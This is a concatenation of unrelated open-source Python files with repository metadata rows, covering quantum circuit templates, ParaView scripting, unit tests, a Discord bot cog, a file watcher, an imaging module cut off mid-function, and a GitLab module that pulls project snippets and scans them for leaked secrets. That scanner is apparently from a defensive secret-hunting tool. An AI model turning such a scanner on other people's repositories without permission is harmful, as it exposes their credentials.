This architecture can be found in `arXiv:quant-ph/0610099 <https://arxiv.org/abs/quant-ph/0610099>`_
and closely resembles `quantum convolutional neural networks <https://arxiv.org/abs/1810.03787>`_.
The argument ``block`` is a user-defined quantum circuit. Each ``block`` may depend on a different set of parameters.
These are passed as a list by the ``template_weights`` argument.
For more details, see *Usage Details* below.
Args:
wires (Iterable): wires that the template acts on
n_block_wires (int): number of wires per block
block (Callable): quantum circuit that defines a block
n_params_block (int): the number of parameters in a block
template_weights (Sequence): list containing the weights for all blocks
.. UsageDetails::
In general, the block takes D parameters and **must** have the following signature:
.. code-block:: python
unitary(parameter1, parameter2, ... parameterD, wires)
For a block with multiple parameters, ``n_params_block`` is equal to the number of parameters in ``block``.
For a block with a single parameter, ``n_params_block`` is equal to the length of the parameter array.
To avoid using ragged arrays, all block parameters should have the same dimension.
The length of the ``template_weights`` argument should match the number of blocks.
The expected number of blocks can be obtained from ``qml.MERA.get_n_blocks(wires, n_block_wires)``.
This example demonstrates the use of ``MERA`` for a simple block.
.. code-block:: python
import pennylane as qml
import numpy as np
def block(weights, wires):
qml.CNOT(wires=[wires[0],wires[1]])
qml.RY(weights[0], wires=wires[0])
qml.RY(weights[1], wires=wires[1])
n_wires = 4
n_block_wires = 2
n_params_block = 2
n_blocks = qml.MERA.get_n_blocks(range(n_wires),n_block_wires)
template_weights = [[0.1,-0.3]]*n_blocks
dev= qml.device('default.qubit',wires=range(n_wires))
@qml.qnode(dev)
def circuit(template_weights):
qml.MERA(range(n_wires),n_block_wires,block, n_params_block, template_weights)
return qml.expval(qml.PauliZ(wires=1))
It may be necessary to reorder the wires to see the MERA architecture clearly:
>>> print(qml.draw(circuit,expansion_strategy='device',wire_order=[2,0,1,3])(template_weights))
2: ───────────────╭C──RY(0.10)──╭X──RY(-0.30)───────────────┤
0: ─╭X──RY(-0.30)─│─────────────╰C──RY(0.10)──╭C──RY(0.10)──┤
1: ─╰C──RY(0.10)──│─────────────╭X──RY(-0.30)─╰X──RY(-0.30)─┤ <Z>
3: ───────────────╰X──RY(-0.30)─╰C──RY(0.10)────────────────┤
"""
num_wires = AnyWires
grad_method = None
@property
def num_params(self):
return 1
def __init__(
self,
wires,
n_block_wires,
block,
n_params_block,
template_weights=None,
do_queue=True,
id=None,
):
ind_gates = compute_indices(wires, n_block_wires)
n_wires = len(wires)
shape = qml.math.shape(template_weights) # (n_params_block, n_blocks)
n_blocks = int(2 ** (np.floor(np.log2(n_wires / n_block_wires)) + 2) - 3)
if shape == ():
template_weights = np.random.rand(n_params_block, int(n_blocks))
else:
if shape[0] != n_blocks:
raise ValueError(
f"Weights tensor must have first dimension of length {n_blocks}; got {shape[0]}"
)
if shape[-1] != n_params_block:
raise ValueError(
f"Weights tensor must have last dimension of length {n_params_block}; got {shape[-1]}"
)
self._hyperparameters = {"ind_gates": ind_gates, "block": block}
super().__init__(template_weights, wires=wires, do_queue=do_queue, id=id)
@staticmethod
def compute_decomposition(
weights, wires, block, ind_gates
): # pylint: disable=arguments-differ,unused-argument
r"""Representation of the operator as a product of other operators.
.. math:: O = O_1 O_2 \dots O_n.
.. seealso:: :meth:`~.MERA.decomposition`.
Args:
weights (list[tensor_like]): list containing the weights for all blocks
wires (Iterable): wires that the template acts on
block (Callable): quantum circuit that defines a block
ind_gates (array): array of wire indices
Returns:
list[.Operator]: decomposition of the operator
"""
op_list = []
if block.__code__.co_argcount > 2:
for idx, w in enumerate(ind_gates):
op_list.append(block(*weights[idx], wires=w))
elif block.__code__.co_argcount == 2:
for idx, w in enumerate(ind_gates):
op_list.append(block(weights[idx], wires=w))
else:
for idx, w in enumerate(ind_gates):
op_list.append(block(wires=w))
return op_list
@staticmethod
def get_n_blocks(wires, n_block_wires):
"""Returns the expected number of blocks for a set of wires and number of wires per block.
Args:
wires (Sequence): number of wires the template acts on
n_block_wires (int): number of wires per block
Returns:
n_blocks (int): number of blocks; expected length of the template_weights argument
"""
n_wires = len(wires)
if not np.log2(n_wires / n_block_wires).is_integer():
warnings.warn(
f"The number of wires should be n_block_wires times 2^n; got n_wires/n_block_wires = {n_wires/n_block_wires}"
)
if n_block_wires > n_wires:
raise ValueError(
f"n_block_wires must be smaller than or equal to the number of wires; got n_block_wires = {n_block_wires} and number of wires = {n_wires}"
)
n_blocks = 2 ** (np.floor(np.log2(n_wires / n_block_wires)) + 2) - 3
return int(n_blocks)
| 38.996169 | 154 | 0.609255 | 6,734 | 0.644279 | 0 | 0 | 2,220 | 0.2124 | 0 | 0 | 6,235 | 0.596537 |
2ccaa53b5e3038c5d05c44b30a9de09a9e84933a | 3,106 | py | Python | paraview/addLinePlotHopefully.py | lindsayad/python | 4b63a8b02de6a7c0caa7bb770f3f22366e066a7f | [
"MIT"
] | null | null | null | paraview/addLinePlotHopefully.py | lindsayad/python | 4b63a8b02de6a7c0caa7bb770f3f22366e066a7f | [
"MIT"
] | null | null | null | paraview/addLinePlotHopefully.py | lindsayad/python | 4b63a8b02de6a7c0caa7bb770f3f22366e066a7f | [
"MIT"
] | null | null | null | try: paraview.simple
except: from paraview.simple import *
paraview.simple._DisableFirstRenderCameraReset()
PlotOverLine6 = GetActiveSource()
PlotOverLine6.Input = []
PlotOverLine6.Source = []
XYChartView1 = GetRenderView()
Delete(PlotOverLine6)
AnimationScene1 = GetAnimationScene()
AnimationScene1.EndTime = 1.0
AnimationScene1.PlayMode = 'Sequence'
lots_of_variables_out_e = ExodusIIReader( FileName=['/home/alexlindsay/zapdos/problems/lots_of_variables_out.e'] )
AnimationScene1.EndTime = 0.0094
AnimationScene1.PlayMode = 'Snap To TimeSteps'
lots_of_variables_out_e.FileRange = [0, 0]
lots_of_variables_out_e.XMLFileName = 'Invalid result'
lots_of_variables_out_e.FilePrefix = '/home/alexlindsay/zapdos/problems/lots_of_variables_out.e'
lots_of_variables_out_e.ModeShape = 5
lots_of_variables_out_e.FilePattern = '%s'
lots_of_variables_out_e.ElementBlocks = ['Unnamed block ID: 0 Type: EDGE2']
lots_of_variables_out_e.NodeSetArrayStatus = []
lots_of_variables_out_e.SideSetArrayStatus = []
lots_of_variables_out_e.PointVariables = ['em']
RenderView7 = CreateRenderView()
RenderView7.CompressorConfig = 'vtkSquirtCompressor 0 3'
RenderView7.InteractionMode = '2D'
RenderView7.UseLight = 1
RenderView7.CameraPosition = [1.0300000212737359e-05, 10000.0, 10000.0]
RenderView7.LightSwitch = 0
RenderView7.Background = [0.31999694819562063, 0.3400015259021897, 0.4299992370489052]
RenderView7.CameraFocalPoint = [1.0300000212737359e-05, 0.0, 0.0]
RenderView7.CameraViewUp = [1.0, 1.0, 0.0]
RenderView7.CenterOfRotation = [1.0300000212737359e-05, 0.0, 0.0]
RenderView7.CameraParallelProjection = 1
AnimationScene1.ViewModules = [ XYChartView1, RenderView7 ]
DataRepresentation13 = Show()
DataRepresentation13.EdgeColor = [0.0, 0.0, 0.5000076295109483]
DataRepresentation13.SelectionPointFieldDataArrayName = 'em'
DataRepresentation13.SelectionCellFieldDataArrayName = 'GlobalElementId'
DataRepresentation13.ScalarOpacityUnitDistance = 9.561673194730194e-06
DataRepresentation13.ExtractedBlockIndex = 2
DataRepresentation13.ScaleFactor = 2.060000042547472e-06
RenderView7.CameraViewUp = [0.7071067811865476, 0.7071067811865476, 0.0]
RenderView7.CameraPosition = [1.0300000212737359e-05, 3.102185033432059e-05, 3.102185033432059e-05]
RenderView7.CameraClippingRange = [4.343280625797747e-05, 4.452959429479509e-05]
RenderView7.CameraParallelScale = 1.1426769862779412e-05
AnimationScene1.ViewModules = XYChartView1
Delete(RenderView7)
Delete(DataRepresentation13)
PlotOverLine7 = PlotOverLine( Source="High Resolution Line Source" )
PlotOverLine7.Source.Point2 = [2.0600000425474718e-05, 0.0, 0.0]
PlotOverLine7.Source.Resolution = 10
SetActiveView(XYChartView1)
DataRepresentation14 = Show()
DataRepresentation14.XArrayName = 'arc_length'
DataRepresentation14.SeriesVisibility = ['ObjectId', '0', 'Points (0)', '0', 'Points (1)', '0', 'Points (2)', '0', 'Points (Magnitude)', '0', 'arc_length', '0', 'vtkOriginalIndices', '0', 'vtkValidPointMask', '0']
DataRepresentation14.UseIndexForXAxis = 0
XYChartView1.BottomAxisRange = [0.0, 2.1e-05]
AnimationScene1.AnimationTime = 0.0094
Render()
| 38.345679 | 213 | 0.808113 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 436 | 0.140373 |
2ccae3f2f4d0694e8447d48bb97cc62a0e4c0a05 | 1,420 | py | Python | Sprint-Challenge/acme_test.py | martinclehman/DS-Unit-3-Sprint-1-Software-Engineering | 7bca22a2b398ee57021bbe7efd66e3d6cd55f527 | [
"MIT"
] | null | null | null | Sprint-Challenge/acme_test.py | martinclehman/DS-Unit-3-Sprint-1-Software-Engineering | 7bca22a2b398ee57021bbe7efd66e3d6cd55f527 | [
"MIT"
] | null | null | null | Sprint-Challenge/acme_test.py | martinclehman/DS-Unit-3-Sprint-1-Software-Engineering | 7bca22a2b398ee57021bbe7efd66e3d6cd55f527 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import unittest
from acme import Product
from acme_report import generate_products, ADJECTIVES, NOUNS
class AcmeProductTests(unittest.TestCase):
"""Making sure Acme products are the tops!"""
def test_default_product_price(self):
"""Test default product price being 10."""
prod = Product('Test Product')
self.assertEqual(prod.price, 10)
def test_default_product_weight(self):
"""Test default product weight being 20."""
prod = Product('Test Product')
self.assertEqual(prod.weight, 20)
def test_stealability_and_explosiveness(self):
prod = Product('Nuclear Weapon', price=1,
weight=1000, flammability=1000000)
self.assertEqual(prod.stealability(), 'Not so stealable...')
self.assertEqual(prod.explode(), '...BABOOM!!')
class AcmeReportTests(unittest.TestCase):
"""Making sure Acme reports are accurate."""
def test_default_num_products(self):
products = generate_products()
self.assertEqual(len(products), 30)
def test_legal_names(self):
products = generate_products()
for product in products:
split = product.name.split(' ')
adjective = split[0]
noun = split[1]
self.assertIn(adjective, ADJECTIVES)
self.assertIn(noun, NOUNS)
if __name__ == '__main__':
unittest.main()
| 30.869565 | 68 | 0.650704 | 1,240 | 0.873239 | 0 | 0 | 0 | 0 | 0 | 0 | 286 | 0.201408 |
2ccc30297fe2bc48b79aa3af93e00e68981d2c5f | 909 | py | Python | cogs/meta.py | popop098/Teasia-Bot.py | 764c3b1cab8e07a9e98690263ad94011ee26ab72 | [
"MIT"
] | 1 | 2020-12-21T12:05:25.000Z | 2020-12-21T12:05:25.000Z | cogs/meta.py | popop098/Taesia-Bot.py | 764c3b1cab8e07a9e98690263ad94011ee26ab72 | [
"MIT"
] | null | null | null | cogs/meta.py | popop098/Taesia-Bot.py | 764c3b1cab8e07a9e98690263ad94011ee26ab72 | [
"MIT"
] | 1 | 2021-10-30T03:45:42.000Z | 2021-10-30T03:45:42.000Z | from discord.ext import commands
import discord
from datetime import datetime
from src import util
from tools.checker import Checker,Embed
class Meta(commands.Cog):
"""Commands relating to the bot itself."""
def __init__(self, bot):
self.bot = bot
self.start_time = datetime.now()
bot.remove_command("help")
@commands.command(name="업타임")
async def uptime(self, ctx):
ch = Checker(ctx=ctx)
em = Embed(ctx=ctx)
if await ch.licence() == 400:
return await ctx.send(embed=em.no_())
elif await ch.licence() == 200:
pass
"""Tells how long the bot has been running."""
uptime_seconds = round(
(datetime.now() - self.start_time).total_seconds())
await ctx.send(f"> 봇이 작동한시간: {util.format_seconds(uptime_seconds)}"
)
def setup(bot):
bot.add_cog(Meta(bot)) | 29.322581 | 75 | 0.609461 | 746 | 0.803014 | 0 | 0 | 537 | 0.578041 | 497 | 0.534984 | 171 | 0.184069 |
2ccc32a9d54e1ab42568aa7d3865a9dbd5b08751 | 2,399 | py | Python | sciencebeam_trainer_delft/utils/cloud_support.py | elifesciences/sciencebeam-trainer-delft | 0f7da96cdf32acf1538a5fded192255158883ba0 | [
"MIT"
] | 5 | 2019-10-19T13:00:34.000Z | 2022-01-16T17:31:42.000Z | sciencebeam_trainer_delft/utils/cloud_support.py | elifesciences/sciencebeam-trainer-delft | 0f7da96cdf32acf1538a5fded192255158883ba0 | [
"MIT"
] | 162 | 2019-08-22T10:28:46.000Z | 2022-03-28T17:33:16.000Z | sciencebeam_trainer_delft/utils/cloud_support.py | elifesciences/sciencebeam-trainer-delft | 0f7da96cdf32acf1538a5fded192255158883ba0 | [
"MIT"
] | null | null | null | import os
import logging
from contextlib import contextmanager
from tempfile import TemporaryDirectory, mkdtemp
from pathlib import Path
from six import string_types
from sciencebeam_trainer_delft.utils.io import copy_file, path_join
LOGGER = logging.getLogger(__name__)
def _is_cloud_location(filepath):
return isinstance(filepath, string_types) and filepath.startswith('gs://')
def _copy_file_to_cloud(source_filepath, target_filepath, overwrite=True):
copy_file(source_filepath, target_filepath, overwrite=overwrite)
def _copy_directory_to_cloud(source_filepath, target_filepath, overwrite=True):
for temp_file_path in Path(source_filepath).glob('**/*'):
if not temp_file_path.is_file():
continue
relative_filename = temp_file_path.relative_to(source_filepath)
cloud_path = path_join(target_filepath, relative_filename)
LOGGER.info('copying %s to %s', temp_file_path, cloud_path)
_copy_file_to_cloud(temp_file_path, cloud_path, overwrite=overwrite)
def _copy_to_cloud(source_filepath, target_filepath, overwrite=True):
if Path(source_filepath).is_file():
_copy_file_to_cloud(source_filepath, target_filepath, overwrite=overwrite)
return
if Path(source_filepath).is_dir():
_copy_directory_to_cloud(source_filepath, target_filepath, overwrite=overwrite)
return
def _get_temp_path(filepath):
return mkdtemp(suffix=os.path.basename(filepath))
@contextmanager
def _cloud_location_as_temp_context(filepath):
with TemporaryDirectory(suffix=os.path.basename(filepath)) as temp_dir:
temp_path = os.path.join(temp_dir, os.path.basename(filepath))
LOGGER.info('temp_path: %s', temp_dir)
yield temp_path
_copy_to_cloud(temp_path, filepath)
@contextmanager
def auto_upload_from_local_path(filepath: str):
if not filepath or not _is_cloud_location(filepath):
os.makedirs(filepath, exist_ok=True)
yield filepath
else:
with _cloud_location_as_temp_context(filepath) as temp_path:
yield temp_path
@contextmanager
def auto_upload_from_local_file(filepath: str):
if not filepath or not _is_cloud_location(filepath):
yield filepath
else:
with _cloud_location_as_temp_context(filepath) as local_path:
yield local_path
def patch_cloud_support():
# deprecated
pass
| 31.155844 | 87 | 0.754481 | 0 | 0 | 823 | 0.34306 | 871 | 0.363068 | 0 | 0 | 58 | 0.024177 |
2ccccaa55f701008cb48549110c575227e96696f | 1,048 | py | Python | gitlab/snippets.py | codeEmitter/token-hunter | 46809c64074b68bb819ea50911bc65f246425106 | [
"BSD-3-Clause"
] | 35 | 2021-01-06T08:26:38.000Z | 2022-01-18T21:18:46.000Z | gitlab/snippets.py | codeEmitter/token-hunter | 46809c64074b68bb819ea50911bc65f246425106 | [
"BSD-3-Clause"
] | null | null | null | gitlab/snippets.py | codeEmitter/token-hunter | 46809c64074b68bb819ea50911bc65f246425106 | [
"BSD-3-Clause"
] | 13 | 2020-11-04T05:37:43.000Z | 2022-01-12T10:22:59.000Z | from logging import warning
from api import gitlab
from utilities import validate, types
gitlab = gitlab.GitLab(types.Arguments().url)
def get_all(projects):
snippets = {}
for project in projects:
for key, value in project.items():
details = gitlab.get_project_snippets(key)
if validate.api_result(details):
warning("[*] Found %s snippets for project %s", len(details), value)
for item in details:
snippets.update({item['id']: item['web_url']})
return snippets
def sniff_secrets(snippets):
if len(snippets) == 0:
return []
secrets = []
raw_data = {}
for snippet_id, snippet_url in snippets.items():
raw_content = gitlab.get_snippet_raw(snippet_id)
raw_data.update({snippet_url: raw_content})
if len(raw_data) > 0:
monitor = types.SecretsMonitor()
found_secrets = monitor.sniff_secrets(raw_data)
for secret in found_secrets:
secrets.append(secret)
return secrets
| 29.942857 | 84 | 0.634542 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 51 | 0.048664 |
2cccf7b04a13dc0853d0b836ac33f0e371b7ca36 | 670 | py | Python | login/weibo_with_known_cookie.py | bobjiangps/python-spider-example | 7021dc3052fe1a667b79b810403e8ae3f03253b3 | [
"MIT"
] | null | null | null | login/weibo_with_known_cookie.py | bobjiangps/python-spider-example | 7021dc3052fe1a667b79b810403e8ae3f03253b3 | [
"MIT"
] | 3 | 2021-03-31T19:20:41.000Z | 2022-03-12T01:03:06.000Z | login/weibo_with_known_cookie.py | bobjiangps/python-spider-example | 7021dc3052fe1a667b79b810403e8ae3f03253b3 | [
"MIT"
] | null | null | null | import requests
if __name__ == "__main__":
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0',
'Connection': 'keep-alive',
'cookie': 'replace your cookie here' # update text
}
session = requests.Session()
response = session.get('https://weibo.com/2671109275/fans?rightmod=1&wvr=6', headers=headers)
print(response.text)
print(response.status_code) | 41.875 | 145 | 0.652239 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 417 | 0.622388 |
2ccd33542df9831359cfe4fc038aded21af9057a | 6,708 | py | Python | wcpan/watchdog/watcher.py | legnaleurc/wcpan.watchdog | a4f5b560327f207a344aae18091ecf6bbeba8189 | [
"MIT"
] | null | null | null | wcpan/watchdog/watcher.py | legnaleurc/wcpan.watchdog | a4f5b560327f207a344aae18091ecf6bbeba8189 | [
"MIT"
] | null | null | null | wcpan/watchdog/watcher.py | legnaleurc/wcpan.watchdog | a4f5b560327f207a344aae18091ecf6bbeba8189 | [
"MIT"
] | null | null | null | from __future__ import annotations
__all__ = ('WatcherContext', 'Watcher')
import asyncio
import os
import time
from concurrent.futures import Executor, ThreadPoolExecutor
from contextlib import AsyncExitStack
from functools import partial
from typing import Awaitable, Callable, Optional, Protocol, Set, TypeVar, Union
from .walker import ChangeEntry, Walker
from .filters import Filter, create_default_filter
T = TypeVar('T')
class Runner(Protocol):
async def __call__(self, cb: Callable[..., T], *args, **kwargs) -> T:
pass
class WatcherContext(object):
"""Context manager of watchers.
This class maintains the context needed by watchers, especially executor.
Parameters will be used as default values for each watchers.
stop_event is an asyncio.Event object which gives the watcher a hint about
when to stop the watching loop. If stop_event is None, the loop will NEVER
stop.
filter_ is a Filter object, to filter out files and directories being
watching. If omitted, create_default_filter() will be used.
sleep_sec is the time in second to wait for new changes coming.
min_sleep_sec is the minimum time in second to wait for new changes coming.
debounce_sec is the maximum time to collect changes.
executor is an Executor object, used to walk through the file system. If
omitted, a ThreadPoolExecutor will be used. If you supplied an Executor,
then it is caller's responsibility to stop the Executor.
"""
def __init__(self,
*,
stop_event: Optional[asyncio.Event] = None,
filter_: Optional[Filter] = None,
sleep_sec: float = 0.4,
min_sleep_sec: float = 0.05,
debounce_sec: float = 1.6,
executor: Optional[Executor] = None,
):
self._stop_event = stop_event
self._filter = filter_
self._sleep_sec = sleep_sec
self._min_sleep_sec = min_sleep_sec
self._debounce_sec = debounce_sec
self._executor = executor
async def __aenter__(self) -> Watcher:
async with AsyncExitStack() as stack:
if self._executor is None:
self._executor = stack.enter_context(ThreadPoolExecutor())
self._raii = stack.pop_all()
return Watcher(self)
async def __aexit__(self, type_, exc, tb):
await self._raii.aclose()
async def _run(self, cb: Callable[..., T], *args, **kwargs):
fn = partial(cb, *args, **kwargs)
loop = asyncio.get_running_loop()
return await loop.run_in_executor(self._executor, fn)
async def _sleep(self, sec: float):
await asyncio.sleep(sec)
class Watcher(object):
def __init__(self, context: WatcherContext) -> None:
self._context = context
def __call__(self,
path: Union[os.PathLike, str],
*,
stop_event: Optional[asyncio.Event] = None,
filter_: Optional[Filter] = None,
sleep_sec: Optional[float] = None,
min_sleep_sec: Optional[float] = None,
debounce_sec: Optional[float] = None,
) -> ChangeIterator:
if not isinstance(path, str):
path = str(path)
if stop_event is None:
stop_event = self._context._stop_event
if filter_ is None:
filter_ = create_default_filter()
if min_sleep_sec is None:
min_sleep_sec = self._context._min_sleep_sec
if sleep_sec is None:
sleep_sec = self._context._sleep_sec
if debounce_sec is None:
debounce_sec = self._context._debounce_sec
return ChangeIterator(
run=self._context._run,
sleep=self._context._sleep,
path=path,
stop_event=stop_event,
filter_=filter_,
sleep_sec=sleep_sec,
min_sleep_sec=min_sleep_sec,
debounce_sec=debounce_sec,
)
class ChangeIterator(object):
def __init__(self,
*,
run: Runner,
sleep: Callable[[float], Awaitable[None]],
path: str,
stop_event: Optional[asyncio.Event],
filter_: Filter,
sleep_sec: float,
min_sleep_sec: float,
debounce_sec: float,
):
self._run = run
self._sleep = sleep
self._path = path
self._stop_event = stop_event
self._filter = filter_
self._sleep_sec = sleep_sec
self._min_sleep_sec = min_sleep_sec
self._debounce_sec = debounce_sec
self._walker: Union[Walker, None] = None
def __aiter__(self):
return self
async def __anext__(self) -> Set[ChangeEntry]:
# Setup the waler, and run it to setup the snapshot.
if not self._walker:
self._walker = Walker(self._filter, self._path)
await self._run(self._walker)
# Changes gathered in this iteration.
changes: Set[ChangeEntry] = set()
# The time interval the walker used.
last_check_took = 0.0
# The timestamp where the changes begin. Used to calculate debouncing.
last_change = 0.0
while True:
# Check stop_event, this is the ONLY way to stop the iteration.
if self._stop_event and self._stop_event.is_set():
raise StopAsyncIteration
# Nothing changed yet, update the timestamp.
if not changes:
last_change = now_in_sec()
# We have to sleep awhile after we have checked last time.
if last_check_took > 0.0:
if changes:
# Likely to have more changes, sleep shorter.
sleep_time = self._min_sleep_sec
else:
# Likely to be idle, sleep longer.
sleep_time = max(
self._sleep_sec - last_check_took,
self._min_sleep_sec,
)
await self._sleep(sleep_time)
# Gathering changes.
time_before_walk = now_in_sec()
new_changes = await self._run(self._walker)
changes.update(new_changes)
# Update timestamps.
time_after_walk = now_in_sec()
last_check_took = time_after_walk - time_before_walk
debounced = time_after_walk - last_change
# We end this iteration if we have got any changes, and one of the
# following condition has meet:
# 1. There is no new changes to gather.
# 2. It exceeds debouncing time.
if changes and (not new_changes or debounced > self._debounce_sec):
return changes
def now_in_sec():
return time.time()
| 33.044335 | 79 | 0.621348 | 6,218 | 0.926953 | 0 | 0 | 0 | 0 | 2,782 | 0.414729 | 1,588 | 0.236732 |
2ccd33c7f828e66ad87c73a0b3febc441c938f51 | 2,709 | py | Python | views/orderbook.py | ZigaMr/borzaKriptovalut-master | a199a9e01ae16800d7f9267424674f23b062b593 | [
"MIT"
] | null | null | null | views/orderbook.py | ZigaMr/borzaKriptovalut-master | a199a9e01ae16800d7f9267424674f23b062b593 | [
"MIT"
] | null | null | null | views/orderbook.py | ZigaMr/borzaKriptovalut-master | a199a9e01ae16800d7f9267424674f23b062b593 | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
import requests
import pandas as pd
import json
data = requests.get(r'https://www.bitstamp.net/api/v2/order_book/ethbtc')
data = data.json()
bids = pd.DataFrame()
bids['quantity'] = [i[1] for i in data['bids']]
bids['price'] = [i[0] for i in data['bids']]
asks = pd.DataFrame()
asks['price'] = [i[0] for i in data['asks']]
asks['quantity'] = [i[1] for i in data['asks']]
asks.price = asks.price.apply(float)
asks.quantity = asks.quantity.apply(float)
bids.price = bids.price.apply(float)
bids.quantity = bids.quantity.apply(float)
bids_dict = {x[1]:x[0] for x in bids.itertuples(index=False)}
asks_dict = {x[0]:x[1] for x in asks.itertuples(index=False)}
bidask = dict()
bidask['asks'] = asks_dict
bidask['bids'] = bids_dict
data['asks'] = [{'price':float(i[0]), 'amount':float(i[1])} for i in data['asks']]
data['bids'] = [{'price':float(i[0]), 'amount':float(i[1])} for i in data['bids']]
with open('order_book2.json', 'w') as fp:
json.dump(data, fp)
def plot_ob(bidask, bps=.25):
# bps: basis points
best_bid = max(bidask["bids"].keys())
best_ask = min(bidask["asks"].keys())
worst_bid = best_bid * (1 - bps)
worst_ask = best_bid * (1 + bps)
filtered_bids = sorted(filter(lambda k: k[0] >= worst_bid, bidask['bids'].items()), key=lambda x:-x[0])
filtered_asks = sorted(filter(lambda k: k[0] <= worst_ask, bidask['asks'].items()), key=lambda x:+x[0])
bsizeacc = 0
bhys = [] # bid - horizontal - ys
bhxmins = [] # bid - horizontal - xmins
bhxmaxs = [] # ...
bvxs = []
bvymins = []
bvymaxs = []
asizeacc = 0
ahys = []
ahxmins = []
ahxmaxs = []
avxs = []
avymins = []
avymaxs = []
for (p1, s1), (p2, s2) in zip(filtered_bids, filtered_bids[1:]):
bvymins.append(bsizeacc)
if bsizeacc == 0:
bsizeacc += s1
bhys.append(bsizeacc)
bhxmins.append(p2)
bhxmaxs.append(p1)
bvxs.append(p2)
bsizeacc += s2
bvymaxs.append(bsizeacc)
for (p1, s1), (p2, s2) in zip(filtered_asks, filtered_asks[1:]):
avymins.append(asizeacc)
if asizeacc == 0:
asizeacc += s1
ahys.append(asizeacc)
ahxmins.append(p1)
ahxmaxs.append(p2)
avxs.append(p2)
asizeacc += s2
avymaxs.append(asizeacc)
plt.hlines(bhys, bhxmins, bhxmaxs, color="green")
plt.vlines(bvxs, bvymins, bvymaxs, color="green")
plt.hlines(ahys, ahxmins, ahxmaxs, color="red")
plt.vlines(avxs, avymins, avymaxs, color="red")
# d_ts = max(ob.keys())
# d_ob = ob[d_ts]
plt.figure(figsize=(5,4))
plot_ob(bidask, bps=.05)
plt.ylim([0, 4000])
plt.show() | 30.1 | 107 | 0.601329 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 358 | 0.132152 |
2ccdb0b6487145d0f81802a42afd953383cafac6 | 525 | py | Python | ex23.py | PhyuAye/Python_exercises-1 | 3a4049d7af5d0bb3a13b89f3040c9e26a888fea6 | [
"MIT"
] | null | null | null | ex23.py | PhyuAye/Python_exercises-1 | 3a4049d7af5d0bb3a13b89f3040c9e26a888fea6 | [
"MIT"
] | null | null | null | ex23.py | PhyuAye/Python_exercises-1 | 3a4049d7af5d0bb3a13b89f3040c9e26a888fea6 | [
"MIT"
] | 1 | 2018-06-26T08:29:44.000Z | 2018-06-26T08:29:44.000Z | import sys
script, input_encoding, error = sys.argv
def main(language_file, encoding, errors):
line = language_file.readline()
if line:
print_line(line, encoding, errors)
return main(language_file, encoding, errors)
def print_line(line, encoding, errors):
next_lang = line.strip()
raw_bytes = next_lang.encode(encoding, errors=errors)
cooked_string = raw_bytes.decode(encoding, errors=errors)
print(raw_bytes, "<===>", cooked_string)
languages = open("languages.txt", encoding="utf-8")
main(languages, input_encoding, error)
| 35 | 57 | 0.777143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 29 | 0.055238 |
2ccddb9cadd2a8adb62f81d94b7e34242493a393 | 5,728 | py | Python | src/imagedata/formats/__init__.py | erling6232/imagedata | 69226b317ff43eb52ed48503582e5770bcb47ec4 | [
"MIT"
] | 1 | 2021-09-02T07:20:19.000Z | 2021-09-02T07:20:19.000Z | src/imagedata/formats/__init__.py | erling6232/imagedata | 69226b317ff43eb52ed48503582e5770bcb47ec4 | [
"MIT"
] | 3 | 2018-02-28T09:54:21.000Z | 2022-03-22T10:05:39.000Z | src/imagedata/formats/__init__.py | erling6232/imagedata | 69226b317ff43eb52ed48503582e5770bcb47ec4 | [
"MIT"
] | null | null | null | """This module provides plugins for various imaging formats.
Standard plugins provides support for DICOM and Nifti image file formats.
"""
# Copyright (c) 2013-2018 Erling Andersen, Haukeland University Hospital, Bergen, Norway
import logging
import sys
import numpy as np
logger = logging.getLogger(__name__)
(SORT_ON_SLICE,
SORT_ON_TAG) = range(2)
sort_on_set = {SORT_ON_SLICE, SORT_ON_TAG}
INPUT_ORDER_NONE = 'none'
INPUT_ORDER_TIME = 'time'
INPUT_ORDER_B = 'b'
INPUT_ORDER_FA = 'fa'
INPUT_ORDER_TE = 'te'
INPUT_ORDER_FAULTY = 'faulty'
input_order_set = {INPUT_ORDER_NONE, INPUT_ORDER_TIME, INPUT_ORDER_B, INPUT_ORDER_FA, INPUT_ORDER_TE,
INPUT_ORDER_FAULTY}
class NotImageError(Exception):
pass
class EmptyImageError(Exception):
pass
class UnknownInputError(Exception):
pass
class UnknownTag(Exception):
pass
class NotTimeOrder(Exception):
pass
class CannotSort(Exception):
pass
class SOPInstanceUIDNotFound(Exception):
pass
class FormatPluginNotFound(Exception):
pass
class WriteNotImplemented(Exception):
pass
def sort_on_to_str(sort_on):
if sort_on == SORT_ON_SLICE:
return "SORT_ON_SLICE"
elif sort_on == SORT_ON_TAG:
return "SORT_ON_TAG"
else:
raise (UnknownTag("Unknown numerical sort_on {:d}.".format(sort_on)))
def str_to_sort_on(s):
if s == "slice":
return SORT_ON_SLICE
elif s == "tag":
return SORT_ON_TAG
else:
raise (UnknownTag("Unknown sort_on string {}.".format(s)))
def str_to_dtype(s):
if s == "none":
return None
elif s == "uint8":
return np.uint8
elif s == "uint16":
return np.uint16
elif s == "int16":
return np.int16
elif s == "int":
return np.int16
elif s == "float":
return np.float
elif s == "float32":
return np.float32
elif s == "float64":
return np.float64
elif s == "double":
return np.double
else:
raise (ValueError("Output data type {} not implemented.".format(s)))
def input_order_to_str(input_order):
if input_order == INPUT_ORDER_NONE:
return "INPUT_ORDER_NONE"
elif input_order == INPUT_ORDER_TIME:
return "INPUT_ORDER_TIME"
elif input_order == INPUT_ORDER_B:
return "INPUT_ORDER_B"
elif input_order == INPUT_ORDER_FA:
return "INPUT_ORDER_FA"
elif input_order == INPUT_ORDER_TE:
return "INPUT_ORDER_TE"
elif input_order == INPUT_ORDER_FAULTY:
return "INPUT_ORDER_FAULTY"
elif issubclass(type(input_order), str):
return input_order
else:
raise (UnknownTag("Unknown numerical input_order {:d}.".format(input_order)))
def input_order_to_dirname_str(input_order):
if input_order == INPUT_ORDER_NONE:
return "none"
